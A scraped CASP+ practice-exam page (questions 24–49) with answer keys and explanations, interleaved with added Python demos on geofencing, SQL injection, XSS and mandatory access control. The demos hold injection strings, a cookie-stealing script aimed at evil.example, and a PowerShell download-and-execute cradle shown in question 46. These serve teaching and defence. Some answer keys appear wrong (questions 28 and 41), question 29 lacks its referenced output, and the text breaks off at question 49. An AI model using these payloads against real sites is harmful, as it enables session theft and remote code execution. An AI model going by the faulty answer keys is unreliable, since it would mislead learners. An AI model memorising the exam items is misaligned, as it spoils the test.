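</p><p>The enter/exit detection described above, written out as an added example that is not part of the exam material: a circular geofence that turns a stream of device location fixes into exactly one alert per crossing, with a second notification for the device owner as the CISO requested. The fence coordinates, radius, device id and track are constructed values, and the haversine formula stands in for whatever positioning source an MDM product actually uses.</p>

```python
# Added example (not from the exam page): a minimal geofence monitor that
# raises an "entered" event when a device's reported position crosses into a
# circular fence around a sensitive area, and an "exited" event on the way out.
# The fence centre, radius and the sample track below are constructed values.
import math

EARTH_RADIUS_M = 6_371_000.0  # mean Earth radius, metres


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two WGS84 points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


class Geofence:
    """Circular fence. Tracks per-device state so each crossing yields one event."""

    def __init__(self, name, lat, lon, radius_m):
        self.name = name
        self.lat, self.lon, self.radius_m = lat, lon, radius_m
        self._inside = {}  # device_id -> bool (last known state)

    def contains(self, lat, lon):
        return haversine_m(self.lat, self.lon, lat, lon) <= self.radius_m

    def update(self, device_id, lat, lon):
        """Feed one location fix; return 'entered', 'exited' or None."""
        now_inside = self.contains(lat, lon)
        was_inside = self._inside.get(device_id, False)
        self._inside[device_id] = now_inside
        if now_inside and not was_inside:
            return "entered"
        if was_inside and not now_inside:
            return "exited"
        return None


def process_track(fence, track):
    """Run a list of (device_id, lat, lon) fixes through the fence.

    Returns the messages that would be sent: one to the CISO and one to the
    device owner per entry, and an audit line per exit.
    """
    alerts = []
    for device_id, lat, lon in track:
        event = fence.update(device_id, lat, lon)
        if event == "entered":
            alerts.append(f"CISO: {device_id} entered {fence.name}")
            alerts.append(f"{device_id}: your entry to {fence.name} was logged and is monitored")
        elif event == "exited":
            alerts.append(f"AUDIT: {device_id} left {fence.name}")
    return alerts


# Constructed data: a 25 m fence around a data centre cage and a device that
# approaches, enters, lingers (no duplicate alert) and leaves.
DC_CAGE = Geofence("DC cage A", 51.500000, -0.120000, 25.0)
SAMPLE_TRACK = [
    ("cfo-phone", 51.500500, -0.120000),  # ~56 m north: outside
    ("cfo-phone", 51.500100, -0.120000),  # ~11 m north: inside -> entered
    ("cfo-phone", 51.500050, -0.120050),  # still inside: no new alert
    ("cfo-phone", 51.500600, -0.120000),  # ~67 m north: outside -> exited
]

if __name__ == "__main__":
    for line in process_track(DC_CAGE, SAMPLE_TRACK):
        print(line)
```

<p>Keeping the last known state per device is what prevents a phone that sits inside the cage from generating an alert on every location update; a real deployment would also expire stale state and add a small hysteresis margin so a device hovering on the boundary does not flap.</p><p>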
Geofencing can also trigger actions or notifications based on the device’s location. For example, the organization can set up a geofencing policy that sends an alert to the CISO and a notification to the device user when a mobile device enters the data center area. Geofencing can also be used to restrict access to certain apps or features based on the device’s location.</p><p>Verified Reference:</p><p>https://developer.android.com/training/location/geofencing</p><p>https://www.manageengine.com/mobile-device-management/mdm-geofencing.html</p><p>https://www.koombea.com/blog/mobile-geofencing/</p><p>25. Which of the following objectives BEST supports leveraging tabletop exercises in business continuity planning?</p><p>A. Determine the optimal placement of hot/warm sites within the enterprise architecture.</p><p>B. Create new processes for identified gaps in continuity planning.</p><p>C. Establish new staff roles and responsibilities for continuity of operations.</p><p>D. Assess the effectiveness of documented processes against a realistic scenario.</p><p>Answer: D</p><p>26. A company is migrating from company-owned phones to a BYOD strategy for mobile devices. The pilot program will start with the executive management team and be rolled out to the rest of the staff in phases. The company’s Chief Financial Officer loses a phone multiple times a year.</p><p>Which of the following will MOST likely secure the data on the lost device?</p><p>A. Require a VPN to be active to access company data.</p><p>B. Set up different profiles based on the person’s risk.</p><p>C. Remotely wipe the device.</p><p>D. Require MFA to access company applications.</p><p>Answer: C</p><p>Explanation:</p><p>Remotely wiping the device is the best way to secure the data on the lost device, as it erases the data and prevents unauthorized access. 
Requiring a VPN to be active to access company data does not protect the data already on the device, which may be stored locally or cached. Setting up different profiles based on the person’s risk does not by itself prevent data loss or theft; it only changes the level of access and the controls applied. Requiring MFA to access company applications likewise does not protect data stored locally or cached on the device.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-byod</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>27. The Chief Information Officer (CIO) wants to establish a non-binding agreement with a third party that outlines the objectives of the mutual arrangement dealing with data transfers between both organizations before establishing a formal partnership.</p><p>Which of the following would MOST likely be used?</p><p>A. MOU</p><p>B. OLA</p><p>C. NDA</p><p>D. SLA</p><p>Answer: A</p><p>Explanation:</p><p>A memorandum of understanding (MOU) records the shared intent and objectives of the parties without creating enforceable obligations, which is what is wanted before a formal partnership exists. An SLA and an OLA define measurable, binding service commitments, and an NDA only restricts disclosure.</p><p>28. A system administrator at a medical imaging company discovers protected health information (PHI) on a general-purpose file server.</p><p>Which of the following steps should the administrator take NEXT?</p><p>A. Isolate all of the PHI on its own VLAN and keep it segregated at Layer 2.</p><p>B. Take an MD5 hash of the server.</p><p>C. Delete all PHI from the network until the legal department is consulted.</p><p>D. Consult the legal department to determine the legal requirements.</p><p>Answer: A</p><p>29. A security analyst is reviewing the following output:</p><p>Which of the following would BEST mitigate this type of attack?</p><p>A. Installing a network firewall</p><p>B. Placing a WAF inline</p><p>C. Implementing an IDS</p><p>D. Deploying a honeypot</p><p>Answer: B</p><p>Explanation:</p><p>The output shows a SQL injection attack that is trying to exploit a web application. 
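</p><p>An added example, not part of the exam material, of what such an injection does against a real database and the two places it can be stopped: in the application by parameterizing the query, and in front of it by an inline rule of the kind a WAF applies. An in-memory sqlite3 table stands in for the back-end database; the user rows, the request log lines and the signature in _SQLI_RULE are constructed for the example, and the signature is a deliberately small stand-in for a WAF rule set.</p>

```python
# Added example (not from the exam page): a string-built login query beside
# its parameterized form, and a WAF-style request check over constructed
# request log lines. sqlite3 stands in for the back-end database.
import re
import sqlite3
from urllib.parse import unquote_plus


def build_db():
    """In-memory users table with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "s3cret"), (2, "bob", "hunter2"), (3, "admin", "Tr0ub4dor")])
    return db


def login_vulnerable(db, username, password):
    """Vulnerable: the attacker's quote closes the literal. With
    username = "admin' OR '1'='1" the WHERE clause becomes
    username = 'admin' OR ('1'='1' AND password = 'x'), so the admin row is
    returned without the password."""
    sql = f"SELECT username FROM users WHERE username = '{username}' AND password = '{password}'"
    return [row[0] for row in db.execute(sql)]


def login_parameterized(db, username, password):
    """Hardened: placeholders pass the values separately, so quotes are just data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (username, password))]


# Constructed WAF-style signature: a quote followed by a boolean tautology,
# a comment sequence that truncates the query, or a stacked DROP.
_SQLI_RULE = re.compile(
    r"('\s*(or|and)\s*'?\d*'?\s*=\s*'?\d*|--|/\*|;\s*drop\s)", re.IGNORECASE)


def waf_inspect(request_line):
    """Return 'block' if the URL-decoded request matches the rule, else 'pass'."""
    return "block" if _SQLI_RULE.search(unquote_plus(request_line)) else "pass"


# Constructed request log lines: one benign login, two injection attempts.
SAMPLE_REQUESTS = [
    "GET /login?user=alice&pass=s3cret HTTP/1.1",
    "GET /login?user=admin'+OR+'1'%3D'1&pass=x HTTP/1.1",
    "GET /login?user=admin'--&pass=x HTTP/1.1",
]

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:    ", login_vulnerable(db, "admin' OR '1'='1", "x"))
    print("parameterized: ", login_parameterized(db, "admin' OR '1'='1", "x"))
    for line in SAMPLE_REQUESTS:
        print(waf_inspect(line), line)
```

<p>The WAF rule has to run on the decoded request, since the attacker URL-encodes the payload; it is still only a signature, so the parameterized query is the control that removes the flaw, and the inline WAF is the control that blocks attempts against code that has not yet been fixed.</p><p>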
A WAF (Web Application Firewall) is a security solution that inspects HTTP requests and can detect and block malicious ones, such as SQL injection, XSS, and CSRF attempts. Placing a WAF inline, so that every request passes through it, would block the injection attempt before it reaches the web server and database. A network firewall filters on addresses and ports and does not parse request contents, an IDS only alerts, and a honeypot diverts attackers rather than protecting the application.</p><p>Reference:</p><p>https://owasp.org/www-community/attacks/SQL_Injection</p><p>https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/</p><p>30. A major broadcasting company that requires continuous availability to streaming content needs to be resilient against DDoS attacks.</p><p>Which of the following is the MOST important inf­rastructure security design element to prevent an outage?</p><p>A. Supporting heterogeneous architecture</p><p>B. Leveraging content delivery network across multiple regions</p><p>C. Ensuring cloud autoscaling is in place</p><p>D. Scaling horizontally to handle increases in traffic</p><p>Answer: B</p><p>Explanation:</p><p>A content delivery network (CDN) is a distributed system of servers that delivers web content to users based on their geographic location, the origin of the content, and the performance of the network. A CDN improves the availability and performance of web applications by caching content closer to the users, reducing latency and bandwidth consumption. A CDN spread across multiple regions also mitigates distributed denial-of-service (DDoS) attacks by absorbing or filtering malicious traffic at its edge before it reaches the origin servers, so no single region's capacity limits the service. Supporting heterogeneous architecture means using different types of hardware, software, or platforms in an IT environment. This can improve resilience by reducing single points of failure, but it does not directly prevent DDoS attacks. 
Ensuring cloud autoscaling is in place means using cloud services that automatically adjust the amount of resources allocated to an application based on the demand or load. This can improve scalability and performance by providing more resources when needed, but it does not directly prevent DDoS attacks and can simply turn an attack into a large bill. Scaling horizontally means adding more servers or nodes to an IT environment to increase its capacity or throughput. This improves scalability and performance by distributing the load across multiple servers, but it does not directly prevent DDoS attacks.</p><p>Reference: [CompTIA Advanced Security Practitioner (CASP+) Certification Exam Objectives], Domain 2: Enterprise Security Architecture, Objective 2.4: Select controls based on systems security evaluation models</p><p>31. An application developer is including third-party background security fixes in an application. The fixes seem to resolve a currently identified security issue. However, when the application is released to the public, reports come in that a previously fixed vulnerability has returned.</p><p>Which of the following should the developer integrate into the process to BEST prevent this type of behavior?</p><p>A. Peer review</p><p>B. Regression testing</p><p>C. User acceptance</p><p>D. Dynamic analysis</p><p>Answer: B</p><p>Explanation:</p><p>A vulnerability that was fixed earlier and reappears after a new change is a regression. Regression testing re-runs the existing test suite, including the tests written when the earlier vulnerability was fixed, after every change, so a third-party fix that reintroduces the old flaw fails the build before release. Peer review, user acceptance testing, and dynamic analysis can each catch defects, but none of them is a systematic check that previously fixed behavior still holds.</p><p>32. Which of the following testing plans is used to discuss disaster recovery scenarios with representatives from multiple departments within an incident response team but without taking any invasive actions?</p><p>A. Disaster recovery checklist</p><p>B. Tabletop exercise</p><p>C. Full interruption test</p><p>D. 
Parallel test</p><p>Answer: B</p><p>Explanation:</p><p>A tabletop exercise is a type of testing plan that is used to discuss disaster recovery scenarios with representatives from multiple departments within an incident response team without taking any invasive actions. A tabletop exercise is a simulation of a potential disaster or incident that involves a verbal or written discussion of how each department would respond to it. The purpose of a tabletop exercise is to identify gaps, weaknesses, or conflicts in the disaster recovery plan, and to improve communication and coordination among the team members. A parallel test and a full interruption test both exercise the recovery systems themselves, and a checklist review does not bring the departments together.</p><p>Reference: [CompTIA CASP+ Study Guide, Second Edition, page 455]</p><p>33. A security architect is implementing a web application that uses a database back end. Prior to production, the architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in place to prevent these attacks.</p><p>Which of the following sources could the architect consult to address this security concern?</p><p>A. SDLC</p><p>B. OVAL</p><p>C. IEEE</p><p>D. OWASP</p><p>Answer: D</p><p>Explanation:</p><p>OWASP is a resource used to identify attack vectors and their mitigations; OVAL is a vulnerability assessment standard.</p><p>OWASP (Open Web Application Security Project) is a source that the security architect could consult to address the security concern of XSS (cross-site scripting) attacks on a web application that uses a database back end. OWASP is a non-profit organization that provides resources and guidance for improving the security of web applications and services. OWASP publishes the OWASP Top 10 list of common web application vulnerabilities and risks, which includes XSS attacks, as well as recommendations and best practices for preventing or mitigating them, such as the Cross Site Scripting Prevention Cheat Sheet, whose core rule is to encode untrusted data for the HTML context in which it is output. 
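</p><p>The OWASP output-encoding rule applied in code, as an added example that is not part of the exam material: the same list of stored comments rendered once by interpolating user input straight into HTML (the flaw) and once after HTML-entity encoding it for the element body context. The page template, the comment strings including the script payload, and the contains_script_tag check are constructed for the example.</p>

```python
# Added example (not from the exam page): the OWASP XSS prevention rule applied
# to a stored-comment page. render_unsafe() interpolates user input straight
# into HTML (the flaw); render_safe() encodes it for the HTML body context with
# html.escape, so a script payload is displayed as text instead of executed.
# The comments below are constructed sample data.
import html
import re

PAGE_TEMPLATE = "<h1>Comments</h1>\n<ul>\n{items}\n</ul>"

# A constructed payload of the kind an attacker stores through a comment form.
ATTACK_COMMENT = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
SAMPLE_COMMENTS = ["Great product", ATTACK_COMMENT, 'Tom & Jerry say "hi"']


def render_unsafe(comments):
    """Vulnerable: user-controlled text becomes HTML markup."""
    items = "\n".join(f"<li>{c}</li>" for c in comments)
    return PAGE_TEMPLATE.format(items=items)


def render_safe(comments):
    """Hardened: every comment is HTML-entity encoded for the element body context."""
    items = "\n".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments)
    return PAGE_TEMPLATE.format(items=items)


_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_script_tag(rendered_html):
    """Crude reviewer check on rendered output: is a live <script> tag present?"""
    return bool(_SCRIPT_TAG.search(rendered_html))


if __name__ == "__main__":
    print("unsafe page carries live script tag:", contains_script_tag(render_unsafe(SAMPLE_COMMENTS)))
    print("safe page carries live script tag:  ", contains_script_tag(render_safe(SAMPLE_COMMENTS)))
    print(render_safe(SAMPLE_COMMENTS))
```

<p>html.escape is the right encoder only for text placed in an HTML element body or a quoted attribute; data inserted into a script block, a URL, or a CSS value needs the encoder for that context, which is the point of the OWASP rule being context-specific.</p><p>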
SDLC (software development life cycle) is not a source for addressing XSS attacks but a framework for developing software in an organized and efficient manner. OVAL (Open Vulnerability and Assessment Language) is not a source for addressing XSS attacks but a standard for expressing system configuration information and vulnerabilities. IEEE (Institute of Electrical and Electronics Engineers) is not a source for addressing XSS attacks but an organization that develops standards for various fields of engineering and technology.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-owasp</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>34. A security officer is requiring all personnel working on a special project to obtain a security clearance commensurate with the level of the information being accessed. Data on this network must be protected at the level of each clearance holder. The need to know must be vetted by the data owner.</p><p>Which of the following should the security officer do to meet these requirements?</p><p>A. Create a rule to authorize personnel only from certain IPs to access the files</p><p>B. Assign labels to the files and require formal access authorization</p><p>C. Assign attributes to each file and allow authorized users to share the files</p><p>D. Assign roles to users and authorize access to files based on the roles</p><p>Answer: B</p><p>Explanation:</p><p>Labeling files and requiring formal access authorization is mandatory access control, and it aligns with the principle of least privilege and the need-to-know basis. By assigning labels to files based on their sensitivity and requiring formal access approval from the data owner, the security officer can ensure that only personnel with the necessary clearance and a legitimate need to access the information can do so. 
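</p><p>The label and need-to-know check described above, as an added example that is not part of the exam material: a Bell-LaPadula style dominance test on sensitivity level plus compartments, combined with an approval list that only the data owner may change. Both conditions must hold for a read to be allowed. The levels, compartments, users and files are constructed for the example.</p>

```python
# Added example (not from the exam page): a mandatory access control check of the
# kind the labelled-file answer implies. Every file carries a label (sensitivity
# level plus compartments); every user holds a clearance of the same shape. Read
# access requires the clearance to dominate the label AND a need-to-know approval
# recorded by the data owner. Levels, compartments, users and files are constructed.
from dataclasses import dataclass, field

LEVELS = {"UNCLASSIFIED": 0, "CONFIDENTIAL": 1, "SECRET": 2, "TOP SECRET": 3}


@dataclass(frozen=True)
class Label:
    level: str
    compartments: frozenset = frozenset()

    def dominates(self, other):
        """Bell-LaPadula dominance: level >= and compartments a superset."""
        return (LEVELS[self.level] >= LEVELS[other.level]
                and self.compartments >= other.compartments)


@dataclass
class LabelledFile:
    name: str
    label: Label
    owner: str
    # user ids the data owner has formally approved for need-to-know
    approved_readers: set = field(default_factory=set)


def grant_need_to_know(f, approver, user):
    """Only the data owner may record a need-to-know approval."""
    if approver != f.owner:
        raise PermissionError(f"{approver} is not the owner of {f.name}")
    f.approved_readers.add(user)


def can_read(user, clearance, f):
    """Return (allowed, reason); both conditions must hold."""
    if not clearance.dominates(f.label):
        return False, "clearance does not dominate file label"
    if user not in f.approved_readers:
        return False, "no need-to-know approval from data owner"
    return True, "ok"


# Constructed project data: two files owned by dana, three users.
PROJECT_PLAN = LabelledFile("project_plan.docx",
                            Label("SECRET", frozenset({"PROJ-X"})), owner="dana")
BUDGET = LabelledFile("budget.xlsx", Label("CONFIDENTIAL"), owner="dana")

CLEARANCES = {
    "alice": Label("SECRET", frozenset({"PROJ-X"})),   # cleared for the project
    "bob":   Label("TOP SECRET"),                      # higher level, wrong compartment
    "carol": Label("CONFIDENTIAL"),                    # level too low
}


def demo():
    """Owner approves two readers, then every user is tested against the plan."""
    grant_need_to_know(PROJECT_PLAN, "dana", "alice")
    grant_need_to_know(BUDGET, "dana", "carol")
    return {u: can_read(u, c, PROJECT_PLAN) for u, c in CLEARANCES.items()}


if __name__ == "__main__":
    for user, (ok, why) in demo().items():
        print(f"{user:6} project_plan.docx -> {'ALLOW' if ok else 'DENY '} ({why})")
```

<p>Bob is the instructive case: a TOP SECRET clearance is not enough when the file sits in a compartment he does not hold, which is exactly why role- or level-only schemes fail the "protected at the level of each clearance holder" requirement.</p><p>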
This approach helps maintain data confidentiality and integrity in line with the project's security requirements. IP-based rules, file attributes with user-controlled sharing, and role assignments do not bind access to the clearance level of the data or to a need-to-know decision by the data owner.</p><p>35. An attacker infiltrated an electricity-generation site and disabled the safety instrumented system. Ransomware was also deployed on the engineering workstation. The environment has back-to-back firewalls separating the corporate and OT systems.</p><p>Which of the following is the MOST likely security consequence of this attack?</p><p>A. A turbine would overheat and cause physical harm.</p><p>B. The engineers would need to go to the historian.</p><p>C. The SCADA equipment could not be maintained.</p><p>D. Data would be exfiltrated through the data diodes.</p><p>Answer: A</p><p>Explanation:</p><p>A safety instrumented system exists to bring the process to a safe state automatically when operating limits are exceeded. With it disabled, and the engineering workstation unusable, nothing shuts down a turbine that overheats, so the consequence is physical harm to equipment and people. Data diodes pass traffic in one direction only and are not an exfiltration path.</p><p>36. A hospitality company experienced a data breach that included customer PII. The hacker used social engineering to convince an employee to grant a third-party application access to some company documents within a cloud file storage service.</p><p>Which of the following is the BEST solution to help prevent this type of attack in the future?</p><p>A. NGFW for web traffic inspection and activity monitoring</p><p>B. CSPM for application configuration control</p><p>C. Targeted employee training and awareness exercises</p><p>D. CASB for OAuth application permission control</p><p>Answer: D</p><p>Explanation:</p><p>The company should use a CASB for OAuth application permission control to help prevent this type of attack in the future. CASB stands for cloud access security broker, a tool that monitors and enforces security policies for cloud applications. A CASB can control which third-party applications are allowed to obtain OAuth consent to the company's cloud file storage service and what permissions (scopes) they may request, so an employee cannot grant a malicious app access even when tricked into trying. 
A CASB can also detect and block any unauthorized or malicious application that tries to access the company’s data. Training reduces the chance an employee is tricked but does not stop the grant; an NGFW inspects traffic rather than consent grants, and CSPM checks the configuration of the company's own cloud resources, not third-party app permissions.</p><p>Verified Reference:</p><p>https://www.kaspersky.com/resource-center/threats/how-to-avoid-social-engineering-attacks</p><p>https://www.eccouncil.org/cybersecurity-exchange/ethical-hacking/understanding-preventing-social-engineering-attacks/</p><p>https://www.indusface.com/blog/10-ways-businesses-can-prevent-social-engineering-attacks/</p><p>37. An internal security audit determines that Telnet is currently being used within the environment to manage network switches.</p><p>Which of the following tools should be utilized to identify credentials in plaintext that are used to log in to these devices?</p><p>A. Fuzzer</p><p>B. Network traffic analyzer</p><p>C. HTTP interceptor</p><p>D. Port scanner</p><p>E. Password cracker</p><p>Answer: B</p><p>Explanation:</p><p>A network traffic analyzer (also known as a packet sniffer) is the best tool to identify credentials being transmitted in plaintext, such as those used in Telnet sessions. Since Telnet transmits data without encryption, a network traffic analyzer can capture the traffic between the client and the network switches and reveal sensitive information, including login credentials, in clear text. This tool helps identify insecure protocols and supports remediation by switching to encrypted alternatives such as SSH. CASP+ highlights the importance of using secure protocols and tools like traffic analyzers to identify vulnerabilities in network communications.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 - Enterprise Security Operations (Network Traffic Analysis and Insecure Protocols)</p><p>CompTIA CASP+ Study Guide: Monitoring Network Traffic for Plaintext Credentials</p><p>38. A development team created a mobile application that contacts a company’s back-end APIs housed in a PaaS environment. 
The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior.</p><p>Which of the following would BEST safeguard the APIs? (Choose two.)</p><p>A. Bot protection</p><p>B. OAuth 2.0</p><p>C. Input validation</p><p>D. Autoscaling endpoints</p><p>E. Rate limiting</p><p>F. CSRF protection</p><p>Answer: A, E</p><p>Explanation:</p><p>Bot protection distinguishes automated scrapers from the legitimate mobile client (through client fingerprinting, challenges, or behavioral signals) and blocks them, and rate limiting caps the number of requests a client or token may make per interval, so a scraper can no longer consume the processor time it did before. Autoscaling would absorb the load at the company's expense without stopping the scraping; OAuth 2.0, input validation, and CSRF protection address authorization and injection, not request volume.</p><p>Reference: https://stackoverflow.com/questions/3161548/how-do-i-prevent-site-scraping</p><p>39. A company’s Chief Information Security Officer is concerned that the company’s proposed move to the cloud could lead to a lack of visibility into network traffic flow logs within the VPC.</p><p>Which of the following compensating controls would be BEST to implement in this situation?</p><p>A. EDR</p><p>B. SIEM</p><p>C. HIDS</p><p>D. UEBA</p><p>Answer: B</p><p>Explanation:</p><p>A SIEM that ingests the cloud provider's VPC flow logs, API audit logs, and instance logs restores centralized visibility into traffic within the VPC. EDR, HIDS, and UEBA are host- or user-centric and do not show network flows between cloud resources.</p><p>Reference: https://runpanther.io/cyber-explained/cloud-based-siem-explained/</p><p>40. A vulnerability scanner detected an obsolete version of an open-source file-sharing application on one of a company’s Linux servers. While the software version is no longer supported by the OSS community, the company’s Linux vendor backported fixes, applied them for all current vulnerabilities, and agrees to support the software in the future.</p><p>Based on this agreement, this finding is BEST categorized as a:</p><p>A. true positive.</p><p>B. true negative.</p><p>C. false positive.</p><p>D. false negative.</p><p>Answer: C</p><p>Explanation:</p><p>The scanner matched on the version string, but the vendor's backported patches mean the reported vulnerabilities are not actually present, so the finding is a false positive. Version-based detection cannot see backports; a credentialed scan that checks the distribution's package versions against the vendor's advisories avoids this.</p><p>41. A help desk technician just informed the security department that a user downloaded a suspicious file from Internet Explorer last night. The user confirmed accessing all the files and folders before going home from work. The next morning, the user was no longer able to boot the system and was presented a screen with a phone number. 
The technician then tries to boot the computer using Wake-on-LAN, but the system would not come up.</p><p>Which of the following explains why the computer would not boot?</p><p>A. The operating system was corrupted.</p><p>B. SELinux was in enforcing mode.</p><p>C. A secure boot violation occurred.</p><p>D. The disk was encrypted.</p><p>Answer: A</p><p>42. A security architect is given the following requirements to secure a rapidly changing enterprise with an increasingly distributed and remote workforce:</p><p>• Cloud-delivered services</p><p>• Full network security stack</p><p>• SaaS application security management</p><p>• Minimal latency for an optimal user experience</p><p>• Integration with the cloud IAM platform</p><p>Which of the following is the BEST solution?</p><p>A. Routing and Remote Access Service (RRAS)</p><p>B. NGFW</p><p>C. Managed Security Service Provider (MSSP)</p><p>D. SASE</p><p>Answer: D</p><p>Explanation:</p><p>Secure access service edge (SASE) delivers the network security stack (secure web gateway, CASB, zero trust network access, and firewall as a service) together with WAN connectivity from cloud points of presence close to the user, integrated with the cloud identity provider, which matches every requirement listed. RRAS and an NGFW are appliance-centric, and an MSSP is an operating model rather than an architecture.</p><p>43. A junior developer is informed about the impact of new malware on an Advanced RISC Machine (ARM) CPU, and the code must be fixed accordingly. Based on the debug, the malware is able to insert itself in another process memory location.</p><p>Which of the following technologies can the developer enable on the ARM architecture to prevent this type of malware?</p><p>A. Execute never</p><p>B. No-execute</p><p>C. Total memory encryption</p><p>D. Virtual memory encryption</p><p>Answer: A</p><p>Explanation:</p><p>Execute never is a technology that can be enabled on the ARM architecture to prevent malware that inserts itself into another process's memory from executing there. Execute never allows each memory region to be tagged as not containing executable code by setting the execute never (XN) bit in the translation table entry. If the XN bit is set to 1, any attempt to execute an instruction from that region results in a permission fault. 
If the XN bit is cleared to 0, code can execute from that memory region. Execute never also prevents speculative instruction fetches from memory regions that are marked as non-executable, which avoids undesirable side effects. By marking data regions such as the stack and heap execute never, the developer ensures that code injected into those regions cannot run. No-execute (NX) is the equivalent mechanism on x86; on ARM the feature is named XN.</p><p>Verified Reference:</p><p>https://developer.arm.com/documentation/ddi0360/f/memory-management-unit/memory-access-control/execute-never-bits</p><p>https://developer.arm.com/documentation/den0013/d/The-Memory-Management-Unit/Memory-attributes/Execute-Never</p><p>https://developer.arm.com/documentation/ddi0406/c/System-Level-Architecture/Virtual-Memory-System-Architecture–VMSA-/Memory-access-control/Execute-never-restrictions-on-instruction-fetching</p><p>44. A pharmaceutical company recently experienced a security breach within its customer-facing web portal. The attackers performed a SQL injection attack and exported tables from the company’s managed database, exposing customer information.</p><p>The company hosts the application with a CSP utilizing the IaaS model.</p><p>Which of the following parties is ultimately responsible for the breach?</p><p>A. The pharmaceutical company</p><p>B. The cloud software provider</p><p>C. The web portal software vendor</p><p>D. The database software vendor</p><p>Answer: A</p><p>Explanation:</p><p>Under the shared responsibility model for IaaS, the provider secures the physical infrastructure and hypervisor, while the customer is responsible for the operating systems, applications, and data it deploys. A SQL injection flaw in the company's own web portal is the company's responsibility, regardless of which vendors supplied the software.</p><p>45. 
A security engineer needs to recommend a solution that will meet the following requirements:</p><p>• Identify sensitive data in the provider’s network</p><p>• Maintain compliance with company and regulatory guidelines</p><p>• Detect and respond to insider threats, privileged user threats, and compromised accounts</p><p>• Enforce data-centric security, such as encryption, tokenization, and access control</p><p>Which of the following solutions should the security engineer recommend to address these requirements?</p><p>A. WAF</p><p>B. CASB</p><p>C. SWG</p><p>D. DLP</p><p>Answer: B</p><p>Explanation:</p><p>The four requirements are the four functions of a CASB (cloud access security broker): visibility into the sensitive data held in a cloud provider's environment, compliance with company and regulatory policy, threat protection against insider threats, privileged users, and compromised accounts, and data security enforced through encryption, tokenization, and access control. A CASB sits between users and cloud services, so it can discover the data stored there and apply these controls to it. DLP (data loss prevention) covers the data identification and classification part and is often a component of a CASB, but on its own it does not detect compromised accounts or tokenize data in the provider's network. A WAF (web application firewall) protects web applications from attacks such as SQL injection or cross-site scripting, and an SWG (secure web gateway) filters outbound web traffic; neither addresses the requirements listed.</p><p>Verified Reference:</p><p>https://www.comptia.org/blog/what-is-data-loss-prevention</p><p>https://partners.comptia.org/docs/default-source/resources/casp-content-guide</p><p>46. 
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file:</p><p>powershell IEX(New-Object Net.WebClient).DownloadString('https://content.comptia.org/casp/whois.ps1');whois</p><p>Which of the following security controls would have alerted and prevented the next phase of the attack?</p><p>A. Antivirus and UEBA</p><p>B. Reverse proxy and sandbox</p><p>C. EDR and application approved list</p><p>D. Forward proxy and MFA</p><p>Answer: C</p><p>Explanation:</p><p>The log line is a PowerShell download cradle: New-Object Net.WebClient fetches a script from a remote URL, DownloadString hands its text straight to Invoke-Expression (IEX), so the code runs in memory without being written to disk, and the newly defined whois command is then called. An EDR agent records and alerts on exactly this behaviour (PowerShell opening a network connection and executing downloaded content on a jump box), and an application approved list stops the tools the script tries to launch in the next phase, since only approved executables may run; when an allow-listing policy such as AppLocker or WDAC is enforced, PowerShell also runs in Constrained Language Mode, which blocks most of what such cradles do. Together they would have both alerted on the cradle and prevented the next phase.</p><p>47. A company underwent an audit in which the following issues were enumerated:</p><p>• Insufficient security controls for internet-facing services, such as VPN and extranet</p><p>• Weak password policies governing external access for third-party vendors</p><p>Which of the following strategies would help mitigate the risks of unauthorized access?</p><p>A. 2FA</p><p>B. RADIUS</p><p>C. Federation</p><p>D. OTP</p><p>Answer: A</p><p>Explanation:</p><p>Two-factor authentication (2FA) adds an additional layer of security by requiring two forms of identification before granting access to an account or system. Implementing 2FA on the VPN, extranet, and vendor access paths significantly reduces the risk of unauthorized access even if passwords are weak or compromised. An OTP is one possible second factor rather than the strategy itself, and RADIUS and federation are authentication transport and trust mechanisms that do not by themselves strengthen the credential.</p><p>48. A software developer has been tasked with creating a unique threat detection mechanism that is based on machine learning. The information system for which the tool is being developed is on a rapid CI/CD pipeline, and the tool developer is considered a supplier to the process.</p><p>Which of the following presents the most risk to the development life cycle and to the ability to deliver the security tool on time?</p><p>A. Deep learning language barriers</p><p>B. 
Big Data processing required for maturity</p><p>C. Secure, multiparty computation requirements</p><p>D. Computing capabilities available to the developer</p><p>Answer: B</p><p>Explanation:</p><p>The most significant risk to the development of a machine-learning-based threat detection tool is the Big Data processing required for maturity. Machine learning models often require large datasets to train effectively, and processing and analyzing this data can be time-consuming and resource-intensive. This can delay the development timeline, especially in a rapid CI/CD pipeline environment where timely delivery is crucial. CASP+ highlights the challenges associated with machine learning and Big Data in security tool development, particularly the resource demands and the need for extensive data to ensure accuracy and maturity.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 2.0 - Enterprise Security Operations (Big Data and Machine Learning Challenges)</p><p>CompTIA CASP+ Study Guide: Implementing and Managing Machine Learning in Security Environments</p><p>49. A company has been the target of LDAP injections, as well as brute-force, whaling, and spear-phishing attacks. The company is concerned about ensuring continued system access. The company has already implemented an SSO system with strong passwords.</p><p>Which of the following additional controls should the company deploy?</p><p>A. Two-factor authentication</p><p>B. Identity proofing</p><p>C. Challenge questions</p><p>D. Live identity verification</p><p>Answer: 